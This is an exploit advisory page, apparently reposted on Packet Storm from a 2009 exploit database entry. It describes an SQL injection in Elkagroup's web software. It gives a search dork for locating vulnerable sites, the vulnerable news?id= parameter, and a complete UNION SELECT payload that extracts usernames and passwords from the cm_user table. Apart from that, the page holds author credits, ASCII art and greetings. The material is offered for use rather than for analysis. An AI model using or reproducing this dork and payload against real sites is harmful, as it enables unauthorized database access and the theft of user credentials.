Software from Elkagroup appears to suffer from a remote SQL injection vulnerability.
2f34e0bfd66bcc42607308ae5c7f2471# Title: elkagroup SQL Injection Vulnerability
# EDB-ID: 10330
# CVE-ID: ()
# OSVDB-ID: ()
# Author: SadHaCkEr
# Published: 2009-12-06
# Verified: no
# Download Exploit Code
# Download N/A
view source
print?
#Dork : "powered by: elkagroup"
[*]##############################################
[+] |____SadHaCkEr__|__\ #
[+] |______________________|___||\*___ #
[+] |______________________|___||""|"*\___, #
[+] |______________________|___||""|*"|___|| #
[+] "([ (@)''(@)""""""(|*(@)(@)********(@)* #
[+]========================================================================================================================================||
[*] About : elkagroup SQL Injection Vulnerability (Iranian Script) ||
[!] Site : http://www.elkagroup.com ||
[!] Author : SadHaCkEr ||
[!] Site : www.alkrsan.net + www.tryag.cc ||
[!] E-Mail : sad@hack3d.org ||
[!] Location : Saudi Arabia ||
[!]=========================================================================================================================================||
[!] MyWebSite http://www.sadx.297m.com ||
[!]=========================================================================================================================================||
[!] Exp:
[!] http://server/news/?id=[SQL] ||
[!]
[!] [SQL] : ||
[!] UNION SELECT 1,2,3,4,5,6,7,8,9,10,group_concat(username,char(58),password),12,13,14,15,16,17,18,19,20,21,22,23 FROM+cm_user--
[!] ||
[!]
[!] ||
[!] Greetz 2 : alkrsan - þAlaooy HaCkEr - S.C.T - RXH - ayaster - Mr.Wolf and All My Friends
[!] ||
[!] Sad Team
[!] ||
[!]
[!]
[!]=========================================================================================================================================||
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!